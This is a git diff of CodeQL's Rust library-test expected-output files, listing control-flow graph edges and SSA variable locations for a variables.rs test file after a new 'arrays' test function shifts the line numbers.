| variables.rs:538:5:538:40 | ExprStmt | | -| variables.rs:537:5:537:23 | ExprStmt | variables.rs:537:5:537:20 | mutable_variable | | -| variables.rs:538:5:538:37 | mutable_variable_immutable_borrow | variables.rs:538:5:538:39 | mutable_variable_immutable_borrow(...) | | -| variables.rs:538:5:538:39 | mutable_variable_immutable_borrow(...) | variables.rs:539:5:539:23 | ExprStmt | | -| variables.rs:538:5:538:40 | ExprStmt | variables.rs:538:5:538:37 | mutable_variable_immutable_borrow | | -| variables.rs:539:5:539:20 | variable_shadow1 | variables.rs:539:5:539:22 | variable_shadow1(...) | | -| variables.rs:539:5:539:22 | variable_shadow1(...) | variables.rs:540:5:540:23 | ExprStmt | | -| variables.rs:539:5:539:23 | ExprStmt | variables.rs:539:5:539:20 | variable_shadow1 | | -| variables.rs:540:5:540:20 | variable_shadow2 | variables.rs:540:5:540:22 | variable_shadow2(...) | | -| variables.rs:540:5:540:22 | variable_shadow2(...) | variables.rs:541:5:541:19 | ExprStmt | | -| variables.rs:540:5:540:23 | ExprStmt | variables.rs:540:5:540:20 | variable_shadow2 | | -| variables.rs:541:5:541:16 | let_pattern1 | variables.rs:541:5:541:18 | let_pattern1(...) | | -| variables.rs:541:5:541:18 | let_pattern1(...) | variables.rs:542:5:542:19 | ExprStmt | | -| variables.rs:541:5:541:19 | ExprStmt | variables.rs:541:5:541:16 | let_pattern1 | | -| variables.rs:542:5:542:16 | let_pattern2 | variables.rs:542:5:542:18 | let_pattern2(...) | | -| variables.rs:542:5:542:18 | let_pattern2(...) | variables.rs:543:5:543:19 | ExprStmt | | -| variables.rs:542:5:542:19 | ExprStmt | variables.rs:542:5:542:16 | let_pattern2 | | -| variables.rs:543:5:543:16 | let_pattern3 | variables.rs:543:5:543:18 | let_pattern3(...) | | -| variables.rs:543:5:543:18 | let_pattern3(...) | variables.rs:544:5:544:19 | ExprStmt | | -| variables.rs:543:5:543:19 | ExprStmt | variables.rs:543:5:543:16 | let_pattern3 | | -| variables.rs:544:5:544:16 | let_pattern4 | variables.rs:544:5:544:18 | let_pattern4(...) 
| | -| variables.rs:544:5:544:18 | let_pattern4(...) | variables.rs:545:5:545:21 | ExprStmt | | -| variables.rs:544:5:544:19 | ExprStmt | variables.rs:544:5:544:16 | let_pattern4 | | -| variables.rs:545:5:545:18 | match_pattern1 | variables.rs:545:5:545:20 | match_pattern1(...) | | -| variables.rs:545:5:545:20 | match_pattern1(...) | variables.rs:546:5:546:21 | ExprStmt | | -| variables.rs:545:5:545:21 | ExprStmt | variables.rs:545:5:545:18 | match_pattern1 | | -| variables.rs:546:5:546:18 | match_pattern2 | variables.rs:546:5:546:20 | match_pattern2(...) | | -| variables.rs:546:5:546:20 | match_pattern2(...) | variables.rs:547:5:547:21 | ExprStmt | | -| variables.rs:546:5:546:21 | ExprStmt | variables.rs:546:5:546:18 | match_pattern2 | | -| variables.rs:547:5:547:18 | match_pattern3 | variables.rs:547:5:547:20 | match_pattern3(...) | | -| variables.rs:547:5:547:20 | match_pattern3(...) | variables.rs:548:5:548:21 | ExprStmt | | -| variables.rs:547:5:547:21 | ExprStmt | variables.rs:547:5:547:18 | match_pattern3 | | -| variables.rs:548:5:548:18 | match_pattern4 | variables.rs:548:5:548:20 | match_pattern4(...) | | -| variables.rs:548:5:548:20 | match_pattern4(...) | variables.rs:549:5:549:21 | ExprStmt | | -| variables.rs:548:5:548:21 | ExprStmt | variables.rs:548:5:548:18 | match_pattern4 | | -| variables.rs:549:5:549:18 | match_pattern5 | variables.rs:549:5:549:20 | match_pattern5(...) | | -| variables.rs:549:5:549:20 | match_pattern5(...) | variables.rs:550:5:550:21 | ExprStmt | | -| variables.rs:549:5:549:21 | ExprStmt | variables.rs:549:5:549:18 | match_pattern5 | | -| variables.rs:550:5:550:18 | match_pattern6 | variables.rs:550:5:550:20 | match_pattern6(...) | | -| variables.rs:550:5:550:20 | match_pattern6(...) | variables.rs:551:5:551:21 | ExprStmt | | -| variables.rs:550:5:550:21 | ExprStmt | variables.rs:550:5:550:18 | match_pattern6 | | -| variables.rs:551:5:551:18 | match_pattern7 | variables.rs:551:5:551:20 | match_pattern7(...) 
| | -| variables.rs:551:5:551:20 | match_pattern7(...) | variables.rs:552:5:552:21 | ExprStmt | | -| variables.rs:551:5:551:21 | ExprStmt | variables.rs:551:5:551:18 | match_pattern7 | | -| variables.rs:552:5:552:18 | match_pattern8 | variables.rs:552:5:552:20 | match_pattern8(...) | | -| variables.rs:552:5:552:20 | match_pattern8(...) | variables.rs:553:5:553:21 | ExprStmt | | -| variables.rs:552:5:552:21 | ExprStmt | variables.rs:552:5:552:18 | match_pattern8 | | -| variables.rs:553:5:553:18 | match_pattern9 | variables.rs:553:5:553:20 | match_pattern9(...) | | -| variables.rs:553:5:553:20 | match_pattern9(...) | variables.rs:554:5:554:36 | ExprStmt | | -| variables.rs:553:5:553:21 | ExprStmt | variables.rs:553:5:553:18 | match_pattern9 | | -| variables.rs:554:5:554:18 | param_pattern1 | variables.rs:554:20:554:22 | "a" | | -| variables.rs:554:5:554:35 | param_pattern1(...) | variables.rs:555:5:555:37 | ExprStmt | | -| variables.rs:554:5:554:36 | ExprStmt | variables.rs:554:5:554:18 | param_pattern1 | | -| variables.rs:554:20:554:22 | "a" | variables.rs:554:26:554:28 | "b" | | -| variables.rs:554:25:554:34 | TupleExpr | variables.rs:554:5:554:35 | param_pattern1(...) | | -| variables.rs:554:26:554:28 | "b" | variables.rs:554:31:554:33 | "c" | | -| variables.rs:554:31:554:33 | "c" | variables.rs:554:25:554:34 | TupleExpr | | -| variables.rs:555:5:555:18 | param_pattern2 | variables.rs:555:20:555:31 | ...::Left | | -| variables.rs:555:5:555:36 | param_pattern2(...) | variables.rs:556:5:556:26 | ExprStmt | | -| variables.rs:555:5:555:37 | ExprStmt | variables.rs:555:5:555:18 | param_pattern2 | | -| variables.rs:555:20:555:31 | ...::Left | variables.rs:555:33:555:34 | 45 | | -| variables.rs:555:20:555:35 | ...::Left(...) | variables.rs:555:5:555:36 | param_pattern2(...) | | -| variables.rs:555:33:555:34 | 45 | variables.rs:555:20:555:35 | ...::Left(...) | | -| variables.rs:556:5:556:23 | destruct_assignment | variables.rs:556:5:556:25 | destruct_assignment(...) 
| | -| variables.rs:556:5:556:25 | destruct_assignment(...) | variables.rs:557:5:557:23 | ExprStmt | | -| variables.rs:556:5:556:26 | ExprStmt | variables.rs:556:5:556:23 | destruct_assignment | | -| variables.rs:557:5:557:20 | closure_variable | variables.rs:557:5:557:22 | closure_variable(...) | | -| variables.rs:557:5:557:22 | closure_variable(...) | variables.rs:558:5:558:19 | ExprStmt | | -| variables.rs:557:5:557:23 | ExprStmt | variables.rs:557:5:557:20 | closure_variable | | -| variables.rs:558:5:558:16 | for_variable | variables.rs:558:5:558:18 | for_variable(...) | | -| variables.rs:558:5:558:18 | for_variable(...) | variables.rs:559:5:559:17 | ExprStmt | | -| variables.rs:558:5:558:19 | ExprStmt | variables.rs:558:5:558:16 | for_variable | | -| variables.rs:559:5:559:14 | add_assign | variables.rs:559:5:559:16 | add_assign(...) | | -| variables.rs:559:5:559:16 | add_assign(...) | variables.rs:560:5:560:13 | ExprStmt | | -| variables.rs:559:5:559:17 | ExprStmt | variables.rs:559:5:559:14 | add_assign | | -| variables.rs:560:5:560:10 | mutate | variables.rs:560:5:560:12 | mutate(...) | | -| variables.rs:560:5:560:12 | mutate(...) | variables.rs:561:5:561:17 | ExprStmt | | -| variables.rs:560:5:560:13 | ExprStmt | variables.rs:560:5:560:10 | mutate | | -| variables.rs:561:5:561:14 | mutate_arg | variables.rs:561:5:561:16 | mutate_arg(...) | | -| variables.rs:561:5:561:16 | mutate_arg(...) | variables.rs:562:5:562:12 | ExprStmt | | -| variables.rs:561:5:561:17 | ExprStmt | variables.rs:561:5:561:14 | mutate_arg | | -| variables.rs:562:5:562:9 | alias | variables.rs:562:5:562:11 | alias(...) | | -| variables.rs:562:5:562:11 | alias(...) | variables.rs:563:5:563:18 | ExprStmt | | -| variables.rs:562:5:562:12 | ExprStmt | variables.rs:562:5:562:9 | alias | | -| variables.rs:563:5:563:15 | capture_mut | variables.rs:563:5:563:17 | capture_mut(...) | | -| variables.rs:563:5:563:17 | capture_mut(...) 
| variables.rs:564:5:564:20 | ExprStmt | | -| variables.rs:563:5:563:18 | ExprStmt | variables.rs:563:5:563:15 | capture_mut | | -| variables.rs:564:5:564:17 | capture_immut | variables.rs:564:5:564:19 | capture_immut(...) | | -| variables.rs:564:5:564:19 | capture_immut(...) | variables.rs:565:5:565:26 | ExprStmt | | -| variables.rs:564:5:564:20 | ExprStmt | variables.rs:564:5:564:17 | capture_immut | | -| variables.rs:565:5:565:23 | async_block_capture | variables.rs:565:5:565:25 | async_block_capture(...) | | -| variables.rs:565:5:565:25 | async_block_capture(...) | variables.rs:566:5:566:14 | ExprStmt | | -| variables.rs:565:5:565:26 | ExprStmt | variables.rs:565:5:565:23 | async_block_capture | | -| variables.rs:566:5:566:11 | structs | variables.rs:566:5:566:13 | structs(...) | | -| variables.rs:566:5:566:13 | structs(...) | variables.rs:567:5:567:14 | ExprStmt | | -| variables.rs:566:5:566:14 | ExprStmt | variables.rs:566:5:566:11 | structs | | -| variables.rs:567:5:567:11 | ref_arg | variables.rs:567:5:567:13 | ref_arg(...) | | -| variables.rs:567:5:567:13 | ref_arg(...) | variables.rs:568:5:568:30 | ExprStmt | | -| variables.rs:567:5:567:14 | ExprStmt | variables.rs:567:5:567:11 | ref_arg | | -| variables.rs:568:5:568:27 | ref_methodcall_receiver | variables.rs:568:5:568:29 | ref_methodcall_receiver(...) | | -| variables.rs:568:5:568:29 | ref_methodcall_receiver(...) | variables.rs:535:11:569:1 | { ... } | | -| variables.rs:568:5:568:30 | ExprStmt | variables.rs:568:5:568:27 | ref_methodcall_receiver | | +| variables.rs:506:5:506:25 | print_i64(...) | variables.rs:500:14:507:1 | { ... } | | +| variables.rs:506:5:506:26 | ExprStmt | variables.rs:506:5:506:13 | print_i64 | | +| variables.rs:506:15:506:15 | a | variables.rs:506:15:506:24 | a.my_get(...) | | +| variables.rs:506:15:506:24 | a.my_get(...) | variables.rs:506:5:506:25 | print_i64(...) | | +| variables.rs:509:1:516:1 | enter fn arrays | variables.rs:510:5:510:26 | let ... = ... 
| | +| variables.rs:509:1:516:1 | exit fn arrays (normal) | variables.rs:509:1:516:1 | exit fn arrays | | +| variables.rs:509:13:516:1 | { ... } | variables.rs:509:1:516:1 | exit fn arrays (normal) | | +| variables.rs:510:5:510:26 | let ... = ... | variables.rs:510:18:510:18 | 1 | | +| variables.rs:510:9:510:13 | a | variables.rs:511:5:511:20 | ExprStmt | match | +| variables.rs:510:17:510:25 | [...] | variables.rs:510:9:510:13 | a | | +| variables.rs:510:18:510:18 | 1 | variables.rs:510:21:510:21 | 2 | | +| variables.rs:510:21:510:21 | 2 | variables.rs:510:24:510:24 | 3 | | +| variables.rs:510:24:510:24 | 3 | variables.rs:510:17:510:25 | [...] | | +| variables.rs:511:5:511:13 | print_i64 | variables.rs:511:15:511:15 | a | | +| variables.rs:511:5:511:19 | print_i64(...) | variables.rs:512:5:512:13 | ExprStmt | | +| variables.rs:511:5:511:20 | ExprStmt | variables.rs:511:5:511:13 | print_i64 | | +| variables.rs:511:15:511:15 | a | variables.rs:511:17:511:17 | 0 | | +| variables.rs:511:15:511:18 | a[0] | variables.rs:511:5:511:19 | print_i64(...) | | +| variables.rs:511:17:511:17 | 0 | variables.rs:511:15:511:18 | a[0] | | +| variables.rs:512:5:512:5 | a | variables.rs:512:7:512:7 | 1 | | +| variables.rs:512:5:512:8 | a[1] | variables.rs:512:12:512:12 | 5 | | +| variables.rs:512:5:512:12 | ... = ... | variables.rs:513:5:513:20 | ExprStmt | | +| variables.rs:512:5:512:13 | ExprStmt | variables.rs:512:5:512:5 | a | | +| variables.rs:512:7:512:7 | 1 | variables.rs:512:5:512:8 | a[1] | | +| variables.rs:512:12:512:12 | 5 | variables.rs:512:5:512:12 | ... = ... | | +| variables.rs:513:5:513:13 | print_i64 | variables.rs:513:15:513:15 | a | | +| variables.rs:513:5:513:19 | print_i64(...) | variables.rs:514:5:514:18 | ExprStmt | | +| variables.rs:513:5:513:20 | ExprStmt | variables.rs:513:5:513:13 | print_i64 | | +| variables.rs:513:15:513:15 | a | variables.rs:513:17:513:17 | 1 | | +| variables.rs:513:15:513:18 | a[1] | variables.rs:513:5:513:19 | print_i64(...) 
| | +| variables.rs:513:17:513:17 | 1 | variables.rs:513:15:513:18 | a[1] | | +| variables.rs:514:5:514:5 | a | variables.rs:514:10:514:10 | 4 | | +| variables.rs:514:5:514:17 | ... = ... | variables.rs:515:5:515:20 | ExprStmt | | +| variables.rs:514:5:514:18 | ExprStmt | variables.rs:514:5:514:5 | a | | +| variables.rs:514:9:514:17 | [...] | variables.rs:514:5:514:17 | ... = ... | | +| variables.rs:514:10:514:10 | 4 | variables.rs:514:13:514:13 | 5 | | +| variables.rs:514:13:514:13 | 5 | variables.rs:514:16:514:16 | 6 | | +| variables.rs:514:16:514:16 | 6 | variables.rs:514:9:514:17 | [...] | | +| variables.rs:515:5:515:13 | print_i64 | variables.rs:515:15:515:15 | a | | +| variables.rs:515:5:515:19 | print_i64(...) | variables.rs:509:13:516:1 | { ... } | | +| variables.rs:515:5:515:20 | ExprStmt | variables.rs:515:5:515:13 | print_i64 | | +| variables.rs:515:15:515:15 | a | variables.rs:515:17:515:17 | 2 | | +| variables.rs:515:15:515:18 | a[2] | variables.rs:515:5:515:19 | print_i64(...) | | +| variables.rs:515:17:515:17 | 2 | variables.rs:515:15:515:18 | a[2] | | +| variables.rs:518:1:525:1 | enter fn ref_arg | variables.rs:519:5:519:15 | let ... = 16 | | +| variables.rs:518:1:525:1 | exit fn ref_arg (normal) | variables.rs:518:1:525:1 | exit fn ref_arg | | +| variables.rs:518:14:525:1 | { ... } | variables.rs:518:1:525:1 | exit fn ref_arg (normal) | | +| variables.rs:519:5:519:15 | let ... = 16 | variables.rs:519:13:519:14 | 16 | | +| variables.rs:519:9:519:9 | x | variables.rs:520:5:520:22 | ExprStmt | match | +| variables.rs:519:13:519:14 | 16 | variables.rs:519:9:519:9 | x | | +| variables.rs:520:5:520:17 | print_i64_ref | variables.rs:520:20:520:20 | x | | +| variables.rs:520:5:520:21 | print_i64_ref(...) | variables.rs:521:5:521:17 | ExprStmt | | +| variables.rs:520:5:520:22 | ExprStmt | variables.rs:520:5:520:17 | print_i64_ref | | +| variables.rs:520:19:520:20 | &x | variables.rs:520:5:520:21 | print_i64_ref(...) 
| | +| variables.rs:520:20:520:20 | x | variables.rs:520:19:520:20 | &x | | +| variables.rs:521:5:521:13 | print_i64 | variables.rs:521:15:521:15 | x | | +| variables.rs:521:5:521:16 | print_i64(...) | variables.rs:523:5:523:15 | let ... = 17 | | +| variables.rs:521:5:521:17 | ExprStmt | variables.rs:521:5:521:13 | print_i64 | | +| variables.rs:521:15:521:15 | x | variables.rs:521:5:521:16 | print_i64(...) | | +| variables.rs:523:5:523:15 | let ... = 17 | variables.rs:523:13:523:14 | 17 | | +| variables.rs:523:9:523:9 | z | variables.rs:524:5:524:22 | ExprStmt | match | +| variables.rs:523:13:523:14 | 17 | variables.rs:523:9:523:9 | z | | +| variables.rs:524:5:524:17 | print_i64_ref | variables.rs:524:20:524:20 | z | | +| variables.rs:524:5:524:21 | print_i64_ref(...) | variables.rs:518:14:525:1 | { ... } | | +| variables.rs:524:5:524:22 | ExprStmt | variables.rs:524:5:524:17 | print_i64_ref | | +| variables.rs:524:19:524:20 | &z | variables.rs:524:5:524:21 | print_i64_ref(...) | | +| variables.rs:524:20:524:20 | z | variables.rs:524:19:524:20 | &z | | +| variables.rs:532:3:534:3 | enter fn bar | variables.rs:532:15:532:18 | self | | +| variables.rs:532:3:534:3 | exit fn bar (normal) | variables.rs:532:3:534:3 | exit fn bar | | +| variables.rs:532:10:532:18 | SelfParam | variables.rs:533:5:533:32 | ExprStmt | | +| variables.rs:532:15:532:18 | self | variables.rs:532:10:532:18 | SelfParam | | +| variables.rs:532:21:534:3 | { ... } | variables.rs:532:3:534:3 | exit fn bar (normal) | | +| variables.rs:533:5:533:9 | * ... | variables.rs:533:29:533:29 | 3 | | +| variables.rs:533:5:533:31 | ... = ... | variables.rs:532:21:534:3 | { ... } | | +| variables.rs:533:5:533:32 | ExprStmt | variables.rs:533:6:533:9 | self | | +| variables.rs:533:6:533:9 | self | variables.rs:533:5:533:9 | * ... | | +| variables.rs:533:13:533:31 | MyStruct {...} | variables.rs:533:5:533:31 | ... = ... 
| | +| variables.rs:533:29:533:29 | 3 | variables.rs:533:13:533:31 | MyStruct {...} | | +| variables.rs:537:1:542:1 | enter fn ref_methodcall_receiver | variables.rs:538:3:538:34 | let ... = ... | | +| variables.rs:537:1:542:1 | exit fn ref_methodcall_receiver (normal) | variables.rs:537:1:542:1 | exit fn ref_methodcall_receiver | | +| variables.rs:537:30:542:1 | { ... } | variables.rs:537:1:542:1 | exit fn ref_methodcall_receiver (normal) | | +| variables.rs:538:3:538:34 | let ... = ... | variables.rs:538:31:538:31 | 1 | | +| variables.rs:538:7:538:11 | a | variables.rs:539:3:539:10 | ExprStmt | match | +| variables.rs:538:15:538:33 | MyStruct {...} | variables.rs:538:7:538:11 | a | | +| variables.rs:538:31:538:31 | 1 | variables.rs:538:15:538:33 | MyStruct {...} | | +| variables.rs:539:3:539:3 | a | variables.rs:539:3:539:9 | a.bar(...) | | +| variables.rs:539:3:539:9 | a.bar(...) | variables.rs:541:3:541:19 | ExprStmt | | +| variables.rs:539:3:539:10 | ExprStmt | variables.rs:539:3:539:3 | a | | +| variables.rs:541:3:541:11 | print_i64 | variables.rs:541:13:541:13 | a | | +| variables.rs:541:3:541:18 | print_i64(...) | variables.rs:537:30:542:1 | { ... } | | +| variables.rs:541:3:541:19 | ExprStmt | variables.rs:541:3:541:11 | print_i64 | | +| variables.rs:541:13:541:13 | a | variables.rs:541:13:541:17 | a.val | | +| variables.rs:541:13:541:17 | a.val | variables.rs:541:3:541:18 | print_i64(...) | | +| variables.rs:544:1:578:1 | enter fn main | variables.rs:545:5:545:25 | ExprStmt | | +| variables.rs:544:1:578:1 | exit fn main (normal) | variables.rs:544:1:578:1 | exit fn main | | +| variables.rs:544:11:578:1 | { ... } | variables.rs:544:1:578:1 | exit fn main (normal) | | +| variables.rs:545:5:545:22 | immutable_variable | variables.rs:545:5:545:24 | immutable_variable(...) | | +| variables.rs:545:5:545:24 | immutable_variable(...) 
| variables.rs:546:5:546:23 | ExprStmt | | +| variables.rs:545:5:545:25 | ExprStmt | variables.rs:545:5:545:22 | immutable_variable | | +| variables.rs:546:5:546:20 | mutable_variable | variables.rs:546:5:546:22 | mutable_variable(...) | | +| variables.rs:546:5:546:22 | mutable_variable(...) | variables.rs:547:5:547:40 | ExprStmt | | +| variables.rs:546:5:546:23 | ExprStmt | variables.rs:546:5:546:20 | mutable_variable | | +| variables.rs:547:5:547:37 | mutable_variable_immutable_borrow | variables.rs:547:5:547:39 | mutable_variable_immutable_borrow(...) | | +| variables.rs:547:5:547:39 | mutable_variable_immutable_borrow(...) | variables.rs:548:5:548:23 | ExprStmt | | +| variables.rs:547:5:547:40 | ExprStmt | variables.rs:547:5:547:37 | mutable_variable_immutable_borrow | | +| variables.rs:548:5:548:20 | variable_shadow1 | variables.rs:548:5:548:22 | variable_shadow1(...) | | +| variables.rs:548:5:548:22 | variable_shadow1(...) | variables.rs:549:5:549:23 | ExprStmt | | +| variables.rs:548:5:548:23 | ExprStmt | variables.rs:548:5:548:20 | variable_shadow1 | | +| variables.rs:549:5:549:20 | variable_shadow2 | variables.rs:549:5:549:22 | variable_shadow2(...) | | +| variables.rs:549:5:549:22 | variable_shadow2(...) | variables.rs:550:5:550:19 | ExprStmt | | +| variables.rs:549:5:549:23 | ExprStmt | variables.rs:549:5:549:20 | variable_shadow2 | | +| variables.rs:550:5:550:16 | let_pattern1 | variables.rs:550:5:550:18 | let_pattern1(...) | | +| variables.rs:550:5:550:18 | let_pattern1(...) | variables.rs:551:5:551:19 | ExprStmt | | +| variables.rs:550:5:550:19 | ExprStmt | variables.rs:550:5:550:16 | let_pattern1 | | +| variables.rs:551:5:551:16 | let_pattern2 | variables.rs:551:5:551:18 | let_pattern2(...) | | +| variables.rs:551:5:551:18 | let_pattern2(...) 
| variables.rs:552:5:552:19 | ExprStmt | | +| variables.rs:551:5:551:19 | ExprStmt | variables.rs:551:5:551:16 | let_pattern2 | | +| variables.rs:552:5:552:16 | let_pattern3 | variables.rs:552:5:552:18 | let_pattern3(...) | | +| variables.rs:552:5:552:18 | let_pattern3(...) | variables.rs:553:5:553:19 | ExprStmt | | +| variables.rs:552:5:552:19 | ExprStmt | variables.rs:552:5:552:16 | let_pattern3 | | +| variables.rs:553:5:553:16 | let_pattern4 | variables.rs:553:5:553:18 | let_pattern4(...) | | +| variables.rs:553:5:553:18 | let_pattern4(...) | variables.rs:554:5:554:21 | ExprStmt | | +| variables.rs:553:5:553:19 | ExprStmt | variables.rs:553:5:553:16 | let_pattern4 | | +| variables.rs:554:5:554:18 | match_pattern1 | variables.rs:554:5:554:20 | match_pattern1(...) | | +| variables.rs:554:5:554:20 | match_pattern1(...) | variables.rs:555:5:555:21 | ExprStmt | | +| variables.rs:554:5:554:21 | ExprStmt | variables.rs:554:5:554:18 | match_pattern1 | | +| variables.rs:555:5:555:18 | match_pattern2 | variables.rs:555:5:555:20 | match_pattern2(...) | | +| variables.rs:555:5:555:20 | match_pattern2(...) | variables.rs:556:5:556:21 | ExprStmt | | +| variables.rs:555:5:555:21 | ExprStmt | variables.rs:555:5:555:18 | match_pattern2 | | +| variables.rs:556:5:556:18 | match_pattern3 | variables.rs:556:5:556:20 | match_pattern3(...) | | +| variables.rs:556:5:556:20 | match_pattern3(...) | variables.rs:557:5:557:21 | ExprStmt | | +| variables.rs:556:5:556:21 | ExprStmt | variables.rs:556:5:556:18 | match_pattern3 | | +| variables.rs:557:5:557:18 | match_pattern4 | variables.rs:557:5:557:20 | match_pattern4(...) | | +| variables.rs:557:5:557:20 | match_pattern4(...) | variables.rs:558:5:558:21 | ExprStmt | | +| variables.rs:557:5:557:21 | ExprStmt | variables.rs:557:5:557:18 | match_pattern4 | | +| variables.rs:558:5:558:18 | match_pattern5 | variables.rs:558:5:558:20 | match_pattern5(...) | | +| variables.rs:558:5:558:20 | match_pattern5(...) 
| variables.rs:559:5:559:21 | ExprStmt | | +| variables.rs:558:5:558:21 | ExprStmt | variables.rs:558:5:558:18 | match_pattern5 | | +| variables.rs:559:5:559:18 | match_pattern6 | variables.rs:559:5:559:20 | match_pattern6(...) | | +| variables.rs:559:5:559:20 | match_pattern6(...) | variables.rs:560:5:560:21 | ExprStmt | | +| variables.rs:559:5:559:21 | ExprStmt | variables.rs:559:5:559:18 | match_pattern6 | | +| variables.rs:560:5:560:18 | match_pattern7 | variables.rs:560:5:560:20 | match_pattern7(...) | | +| variables.rs:560:5:560:20 | match_pattern7(...) | variables.rs:561:5:561:21 | ExprStmt | | +| variables.rs:560:5:560:21 | ExprStmt | variables.rs:560:5:560:18 | match_pattern7 | | +| variables.rs:561:5:561:18 | match_pattern8 | variables.rs:561:5:561:20 | match_pattern8(...) | | +| variables.rs:561:5:561:20 | match_pattern8(...) | variables.rs:562:5:562:21 | ExprStmt | | +| variables.rs:561:5:561:21 | ExprStmt | variables.rs:561:5:561:18 | match_pattern8 | | +| variables.rs:562:5:562:18 | match_pattern9 | variables.rs:562:5:562:20 | match_pattern9(...) | | +| variables.rs:562:5:562:20 | match_pattern9(...) | variables.rs:563:5:563:36 | ExprStmt | | +| variables.rs:562:5:562:21 | ExprStmt | variables.rs:562:5:562:18 | match_pattern9 | | +| variables.rs:563:5:563:18 | param_pattern1 | variables.rs:563:20:563:22 | "a" | | +| variables.rs:563:5:563:35 | param_pattern1(...) | variables.rs:564:5:564:37 | ExprStmt | | +| variables.rs:563:5:563:36 | ExprStmt | variables.rs:563:5:563:18 | param_pattern1 | | +| variables.rs:563:20:563:22 | "a" | variables.rs:563:26:563:28 | "b" | | +| variables.rs:563:25:563:34 | TupleExpr | variables.rs:563:5:563:35 | param_pattern1(...) 
| | +| variables.rs:563:26:563:28 | "b" | variables.rs:563:31:563:33 | "c" | | +| variables.rs:563:31:563:33 | "c" | variables.rs:563:25:563:34 | TupleExpr | | +| variables.rs:564:5:564:18 | param_pattern2 | variables.rs:564:20:564:31 | ...::Left | | +| variables.rs:564:5:564:36 | param_pattern2(...) | variables.rs:565:5:565:26 | ExprStmt | | +| variables.rs:564:5:564:37 | ExprStmt | variables.rs:564:5:564:18 | param_pattern2 | | +| variables.rs:564:20:564:31 | ...::Left | variables.rs:564:33:564:34 | 45 | | +| variables.rs:564:20:564:35 | ...::Left(...) | variables.rs:564:5:564:36 | param_pattern2(...) | | +| variables.rs:564:33:564:34 | 45 | variables.rs:564:20:564:35 | ...::Left(...) | | +| variables.rs:565:5:565:23 | destruct_assignment | variables.rs:565:5:565:25 | destruct_assignment(...) | | +| variables.rs:565:5:565:25 | destruct_assignment(...) | variables.rs:566:5:566:23 | ExprStmt | | +| variables.rs:565:5:565:26 | ExprStmt | variables.rs:565:5:565:23 | destruct_assignment | | +| variables.rs:566:5:566:20 | closure_variable | variables.rs:566:5:566:22 | closure_variable(...) | | +| variables.rs:566:5:566:22 | closure_variable(...) | variables.rs:567:5:567:19 | ExprStmt | | +| variables.rs:566:5:566:23 | ExprStmt | variables.rs:566:5:566:20 | closure_variable | | +| variables.rs:567:5:567:16 | for_variable | variables.rs:567:5:567:18 | for_variable(...) | | +| variables.rs:567:5:567:18 | for_variable(...) | variables.rs:568:5:568:17 | ExprStmt | | +| variables.rs:567:5:567:19 | ExprStmt | variables.rs:567:5:567:16 | for_variable | | +| variables.rs:568:5:568:14 | add_assign | variables.rs:568:5:568:16 | add_assign(...) | | +| variables.rs:568:5:568:16 | add_assign(...) | variables.rs:569:5:569:13 | ExprStmt | | +| variables.rs:568:5:568:17 | ExprStmt | variables.rs:568:5:568:14 | add_assign | | +| variables.rs:569:5:569:10 | mutate | variables.rs:569:5:569:12 | mutate(...) | | +| variables.rs:569:5:569:12 | mutate(...) 
| variables.rs:570:5:570:17 | ExprStmt | | +| variables.rs:569:5:569:13 | ExprStmt | variables.rs:569:5:569:10 | mutate | | +| variables.rs:570:5:570:14 | mutate_arg | variables.rs:570:5:570:16 | mutate_arg(...) | | +| variables.rs:570:5:570:16 | mutate_arg(...) | variables.rs:571:5:571:12 | ExprStmt | | +| variables.rs:570:5:570:17 | ExprStmt | variables.rs:570:5:570:14 | mutate_arg | | +| variables.rs:571:5:571:9 | alias | variables.rs:571:5:571:11 | alias(...) | | +| variables.rs:571:5:571:11 | alias(...) | variables.rs:572:5:572:18 | ExprStmt | | +| variables.rs:571:5:571:12 | ExprStmt | variables.rs:571:5:571:9 | alias | | +| variables.rs:572:5:572:15 | capture_mut | variables.rs:572:5:572:17 | capture_mut(...) | | +| variables.rs:572:5:572:17 | capture_mut(...) | variables.rs:573:5:573:20 | ExprStmt | | +| variables.rs:572:5:572:18 | ExprStmt | variables.rs:572:5:572:15 | capture_mut | | +| variables.rs:573:5:573:17 | capture_immut | variables.rs:573:5:573:19 | capture_immut(...) | | +| variables.rs:573:5:573:19 | capture_immut(...) | variables.rs:574:5:574:26 | ExprStmt | | +| variables.rs:573:5:573:20 | ExprStmt | variables.rs:573:5:573:17 | capture_immut | | +| variables.rs:574:5:574:23 | async_block_capture | variables.rs:574:5:574:25 | async_block_capture(...) | | +| variables.rs:574:5:574:25 | async_block_capture(...) | variables.rs:575:5:575:14 | ExprStmt | | +| variables.rs:574:5:574:26 | ExprStmt | variables.rs:574:5:574:23 | async_block_capture | | +| variables.rs:575:5:575:11 | structs | variables.rs:575:5:575:13 | structs(...) | | +| variables.rs:575:5:575:13 | structs(...) | variables.rs:576:5:576:14 | ExprStmt | | +| variables.rs:575:5:575:14 | ExprStmt | variables.rs:575:5:575:11 | structs | | +| variables.rs:576:5:576:11 | ref_arg | variables.rs:576:5:576:13 | ref_arg(...) | | +| variables.rs:576:5:576:13 | ref_arg(...) 
| variables.rs:577:5:577:30 | ExprStmt | | +| variables.rs:576:5:576:14 | ExprStmt | variables.rs:576:5:576:11 | ref_arg | | +| variables.rs:577:5:577:27 | ref_methodcall_receiver | variables.rs:577:5:577:29 | ref_methodcall_receiver(...) | | +| variables.rs:577:5:577:29 | ref_methodcall_receiver(...) | variables.rs:544:11:578:1 | { ... } | | +| variables.rs:577:5:577:30 | ExprStmt | variables.rs:577:5:577:27 | ref_methodcall_receiver | | breakTarget continueTarget diff --git a/rust/ql/test/library-tests/variables/Ssa.expected b/rust/ql/test/library-tests/variables/Ssa.expected index 18fc0cffc35..714c5e34a4e 100644 --- a/rust/ql/test/library-tests/variables/Ssa.expected +++ b/rust/ql/test/library-tests/variables/Ssa.expected @@ -5,8 +5,8 @@ nonSsaVariable | variables.rs:379:13:379:13 | z | | variables.rs:392:13:392:13 | x | | variables.rs:426:13:426:13 | z | -| variables.rs:492:13:492:13 | a | -| variables.rs:529:11:529:11 | a | +| variables.rs:501:13:501:13 | a | +| variables.rs:538:11:538:11 | a | definition | variables.rs:3:14:3:14 | s | variables.rs:3:14:3:14 | s | | variables.rs:7:14:7:14 | i | variables.rs:7:14:7:14 | i | 
